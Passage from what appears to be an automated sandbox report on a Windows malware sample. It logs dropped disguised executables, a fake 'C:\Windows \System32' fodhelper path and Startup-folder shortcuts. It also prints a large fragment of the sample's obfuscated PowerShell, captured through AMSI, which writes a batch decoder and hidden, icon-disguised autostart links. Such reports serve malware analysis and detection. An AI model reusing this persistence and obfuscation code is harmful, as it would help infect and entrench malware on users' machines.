Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD72D80 push eax; ret 11_2_6FD72D9E
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD80995 push ecx; ret 11_2_6FD809A8
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD9A6AA push EF3FEFD4h; iretd 11_2_6FD9A6B1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD8BF60 push ecx; ret 11_2_6FD8BF73
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD99CD8 pushad ; iretd 11_2_6FD99CE6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFF443900BD pushad ; iretd 20_2_00007FFF443900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 20_2_00007FFF444662FB push esi; ret 20_2_00007FFF44466307
Source: MSVCR100.txt.4.dr Static PE information: section name: .text entropy: 6.90903234258047
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32\fodhelper.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\exe.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\_kjfech8_V.exe (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\MSVCR100.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\i7.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\MSVCR100.dll (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\WebView2Loader.dll (copy) Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\WebView2Loader.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\jli.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\_kjfech8_Vi7.exe (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows \System32\fodhelper.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\exe.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\i7.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\MSVCR100.txt Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\_kjfech8_V\WebView2Loader.txt Jump to dropped file

Boot Survival
barindex
Powershell creates an autostart link
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.exe del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.cmd ${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}.${_/|\_/|////\__|/_|\\_}" ${\\\\__/////////} = "@Echo off`r`n"${\\\\__/////////} += "Setlocal EnableExtensions`r`n" ${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n" ${\\\\__/////////} += "cd %SystemRoot%\System32`r`n" ${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}`"`r`n"${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n" ${\\\\__/////////} | Set-Content ${/_//_//_/}function _____/\_/\/\_/\/=\\\\\\\\\\/////{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.ai" ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\" ${/=\/\__/=\/=\/=\_}.WindowStyle = 7 ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA=='))) ${/=\/\__/=\/=\/=\_}.Save() }finally{}}function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Argume
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: .lnk del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.exe del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.cmd ${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}.${_/|\_/|////\__|/_|\\_}" ${\\\\__/////////} = "@Echo off`r`n"${\\\\__/////////} += "Setlocal EnableExtensions`r`n" ${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n" ${\\\\__/////////} += "cd %SystemRoot%\System32`r`n" ${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}`"`r`n"${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n" ${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n" ${\\\\__/////////} += ")`r`n" ${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n" ${\\\\__/////////} | Set-Content ${/_//_//_/}function _____/\_/\/\_/\/=\\\\\\\\\\/////{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.ai" ${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\" ${/=\/\__/=\/=\/=\_}.WindowStyle = 7 ${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA=='))) ${/=\/\__/=\/=\/=\_}.Save() }finally{}}function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\{ Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/}); try{ ${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell ${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==}) ${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}" ${/=\/\__/=\/=\/=\_}.Argume
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_V.lnk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VEX.lnk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAT.lnk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_VAA.lnk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\_kjfech8_Vy.lnk Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCA277 GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress, 9_2_6FDCA277
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
